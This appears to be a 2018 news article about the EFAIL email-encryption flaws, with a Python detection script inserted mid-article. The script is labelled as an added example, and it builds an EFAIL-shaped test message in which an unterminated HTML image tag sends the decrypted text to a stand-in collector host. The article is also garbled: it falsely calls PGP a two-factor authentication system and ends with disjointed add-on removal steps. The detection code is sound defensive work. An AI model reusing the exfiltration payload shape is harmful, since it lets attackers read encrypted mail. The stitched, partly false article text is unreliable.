New encryption vulnerability means email is no longer secure

Florence Fletcher
May 14, 2018

EFAIL can enable attackers to decrypt users' encrypted messages and freely read their contents.

PGP, which stands for Pretty Good Privacy, is one of the most popular encryption programs; it is a two-factor authentication system. It does not encrypt metadata and is far from easy to use, but it is nevertheless widely regarded as by far the safest way to send secure emails.

The most serious vulnerabilities have resided in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. Researchers are advising users to rely on end-to-end encrypted messaging apps instead, in the meantime.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails.

In addition, the researchers recommended people "use alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted mail". Dubbing the series of flaws that make this attack possible eFail, researchers said that some of these security vulnerabilities are a decade old. The security loopholes are claimed to expose the plaintext of encrypted emails to attackers and put even emails sent in the past at risk. The first method directly sends the decrypted information to the attacker by exploiting how images are embedded into emails. The vulnerabilities allow attackers to exfiltrate email plaintexts by embedding previously obtained ciphertext into unviewable parts of an email and combining it with HTML code.
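The direct-exfiltration structure the article describes (ciphertext placed between HTML fragments so that the client, after decrypting, embeds the plaintext into an image URL it then fetches) can be checked for on the receiving side. The following is an added example, not code from the article or from the EFAIL researchers: a small Python script that parses a MIME message with the standard library, flags an encrypted part that is wrapped by HTML parts and an HTML part that ends inside an unterminated tag, and, as a renderer-side mitigation, strips remote `src`/`href`/`background` URLs from decrypted HTML so the client cannot leak anything by fetching them. The sample messages, the `example.test` hostnames and the armored "ciphertext" are all constructed placeholders.

```python
"""Added example, not from the article: two defensive checks against the
EFAIL "direct exfiltration" message shape.

1. efail_indicators(raw) parses a MIME message and reports (a) an encrypted
   part sitting between HTML parts and (b) an HTML part that ends inside an
   unterminated tag, the shape that lets a client splice decrypted text into
   an image URL.
2. strip_remote_references(html) removes remote src/href/background URLs
   from decrypted HTML so a renderer cannot leak plaintext by fetching them.

All sample messages below are constructed; URLs and ciphertext are placeholders.
"""
import email
import re
from email import policy
from email.message import EmailMessage

PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"
ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime", "application/pgp-encrypted"}
# Attributes whose value is a remote (http, https or protocol-relative) URL.
REMOTE_ATTR = re.compile(
    r'\s(src|href|background)\s*=\s*(["\']?)\s*(?:https?:|//)[^"\'\s>]*\2', re.I)


def is_encrypted_part(part):
    """S/MIME or PGP/MIME part, or an inline armored PGP block in text/plain."""
    ctype = part.get_content_type()
    if ctype in ENCRYPTED_TYPES:
        return True
    return ctype == "text/plain" and PGP_ARMOR in part.get_content()


def ends_in_open_tag(html):
    """True if the last '<' in the part never gets its closing '>'.
    A client that concatenates the decrypted next part into this document
    would complete the tag with the plaintext."""
    last_open = html.rfind("<")
    return last_open != -1 and ">" not in html[last_open:]


def efail_indicators(raw):
    """Return a list of human-readable findings for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    if not msg.is_multipart():
        return findings
    parts = list(msg.iter_parts())  # top-level children only
    for i, part in enumerate(parts):
        if part.get_content_type() == "text/html" and ends_in_open_tag(part.get_content()):
            findings.append(f"part {i}: HTML ends inside an unterminated tag")
        if is_encrypted_part(part):
            html_before = any(p.get_content_type() == "text/html" for p in parts[:i])
            html_after = any(p.get_content_type() == "text/html" for p in parts[i + 1:])
            if html_before and html_after:
                findings.append(f"part {i}: encrypted part wrapped by HTML parts")
    return findings


def strip_remote_references(html):
    """Drop remote src/href/background attributes from decrypted HTML before rendering."""
    return REMOTE_ATTR.sub("", html)


def build_message(parts):
    """Constructed multipart/mixed sample; parts is a list of (text subtype, body)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "recipient@example.test"
    msg["Subject"] = "constructed sample"
    msg.make_mixed()
    for subtype, body in parts:
        sub = EmailMessage()
        sub.set_content(body, subtype=subtype)
        msg.attach(sub)
    return msg.as_string()


# Placeholder armored block; not a real ciphertext.
PLACEHOLDER_PGP = (f"{PGP_ARMOR}\n\nUExBQ0VIT0xERVIgTk9UIFJFQUwgQ0lQSEVSVEVYVA==\n"
                   "-----END PGP MESSAGE-----\n")

# Ordinary mail: one encrypted text part and nothing else.
BENIGN_MESSAGE = build_message([("plain", PLACEHOLDER_PGP)])

# EFAIL-shaped mail: HTML ending inside an image tag, the encrypted part,
# then HTML that closes the tag. The collector URL is a constructed placeholder.
SUSPICIOUS_MESSAGE = build_message([
    ("html", '<p>Hello</p><img src="https://collector.example.test/'),
    ("plain", PLACEHOLDER_PGP),
    ("html", '">'),
])

if __name__ == "__main__":
    print("benign:", efail_indicators(BENIGN_MESSAGE))
    print("suspicious:", efail_indicators(SUSPICIOUS_MESSAGE))
    print(strip_remote_references('<img src="https://example.test/a.png"><p>ok</p>'))
```

The structural check is a heuristic and belongs at a gateway or in the client before decryption; the remote-reference stripper is the cheaper and more general defence, since a client that never fetches remote content from decrypted HTML has no channel to leak through, whatever the message shape.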


UPDATE 2: Because some researchers started disclosing details about the vulnerability ahead of schedule, the efail.de website is now live, along with the research paper, both containing more info on the EFAIL vulnerability.

University researchers from Münster and Bochum in Germany, as well as Leuven in Belgium, discovered the flaws in the encryption methods that can be used with popular email applications such as Microsoft Outlook, Apple Mail and Enigmail for Thunderbird, which all offer to decrypt emails on the fly. Some have criticized the researchers for teasing the vulnerability before publishing their full paper on it, while others have jumped straight to disabling PGP in their email clients.

"You need to take action now", says Alan Woodward, a professor of computer science at the University of Surrey.

Click on the hamburger menu and select Add-ons from the right panel of the menu.

On the second screen, keep everything as it is but uncheck "GpgOL" from the options.
